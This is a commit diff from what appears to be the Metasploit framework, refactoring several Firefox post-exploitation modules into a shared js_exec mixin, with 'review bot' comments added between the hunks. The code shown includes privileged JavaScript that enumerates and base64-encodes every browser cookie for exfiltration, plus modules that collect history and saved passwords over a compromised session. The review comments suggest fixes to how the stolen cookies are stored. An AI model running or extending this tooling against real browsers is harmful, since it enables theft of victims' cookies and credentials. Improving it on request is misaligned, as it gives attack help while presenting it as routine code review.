Refactors firefox js usage into a mixin.
parent
1353c62967
commit
f94d1f6546
|
@ -9,7 +9,17 @@
|
|||
|
||||
module Msf
|
||||
module Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
|
||||
# Sends the +js+ code to the remote session, which executes it in Firefox's
|
||||
# privileged javascript context
|
||||
# @return [String] the results that were sent back. This can be achieved through
|
||||
# calling the "send" function, or by just returning the value in +js+
|
||||
def js_exec(js)
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]")
|
||||
session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
end
|
||||
|
||||
# Puts the shellcode into memory, adds X flag, and calls it
|
||||
# The js function throws on error
|
||||
# @return [String] javascript code containing the execShellcode() javascript fn
|
||||
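Review bot: `js_exec` reads `session` and `datastore['TIMEOUT']`, neither of which the visible part of this mixin defines, so every including module has to supply both, and the doc comment neither says so nor has a `@param` line. I would add `# @param js [String] javascript to run in the privileged context` plus a sentence stating that the including module needs an active session and a registered `TIMEOUT` option. The framing also assumes that `js` never contains the literal `[/JAVASCRIPT]` and that the returned data never contains `[!JAVASCRIPT]`; a one-line comment recording that assumption would help the next maintainer. What `shell_read_until_token` returns on timeout is not visible here, so the `@return` line should probably hedge that the result may be empty. The mixin continues outside this hunk.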
|
|
|
@ -117,4 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def html
|
||||
"<!doctype html><html><body><script>#{js}</script></body></html>"
|
||||
end
|
||||
end
|
||||
end
|
|
@ -5,11 +5,9 @@
|
|||
|
||||
require 'json'
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/firefox'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Payload::Firefox
|
||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -29,12 +27,14 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
begin
|
||||
cookies = JSON.parse(results)
|
||||
cookies.each do |entry|
|
||||
entry.keys.each { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
|
||||
end
|
||||
|
||||
file = store_loot("firefox.cookies.json", "text/json", rhost, results)
|
||||
print_good("Saved #{cookies.length} cookies to #{file}")
|
||||
rescue JSON::ParserError => e
|
||||
|
@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post
|
|||
%Q|
|
||||
(function(send){
|
||||
try {
|
||||
var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
|
||||
var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
|
||||
.getService(Components.interfaces.nsICookieManager);
|
||||
var cookies = [];
|
||||
|
@ -54,7 +55,7 @@ class Metasploit3 < Msf::Post
|
|||
while (iter.hasMoreElements()){
|
||||
var cookie = iter.getNext();
|
||||
if (cookie instanceof Components.interfaces.nsICookie){
|
||||
cookies.push({host:cookie.host, name:cookie.name, value:cookie.value})
|
||||
cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
|
||||
}
|
||||
}
|
||||
send(JSON.stringify(cookies));
|
||||
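Review bot: The loop in `run` base64-decodes every field of `cookies`, but `store_loot` is still passed `results`, the raw string returned by `js_exec`, so the saved loot presumably keeps the base64-encoded values and the decoded structure is used only for the count in `print_good`. If the loot file is meant to hold readable cookies, pass the decoded data instead, e.g. `file = store_loot("firefox.cookies.json", "text/json", rhost, cookies.to_json)`; otherwise add a comment saying the file is intentionally left encoded. Which lines are additions is inferred from the hunk counts, since the page has lost its `+`/`-` markers. `run` continues past the end of its hunk.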
|
|
|
@ -5,11 +5,9 @@
|
|||
|
||||
require 'json'
|
||||
require 'msf/core'
|
||||
require 'msf/core/payload/firefox'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Payload::Firefox
|
||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
def initialize(info={})
|
||||
|
@ -30,9 +28,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
begin
|
||||
history = JSON.parse(results)
|
||||
|
|
|
@ -29,9 +29,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
print_status "Running the privileged javascript..."
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
begin
|
||||
passwords = JSON.parse(results)
|
||||
|
|
|
@ -10,6 +10,7 @@ require 'msf/core/payload/firefox'
|
|||
class Metasploit3 < Msf::Post
|
||||
|
||||
include Msf::Payload::Firefox
|
||||
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -36,9 +37,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def run
|
||||
session.shell_write("[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]")
|
||||
results = session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT'])
|
||||
|
||||
results = js_exec(js_payload)
|
||||
if results.present?
|
||||
print_good results
|
||||
else
|
||||
|
|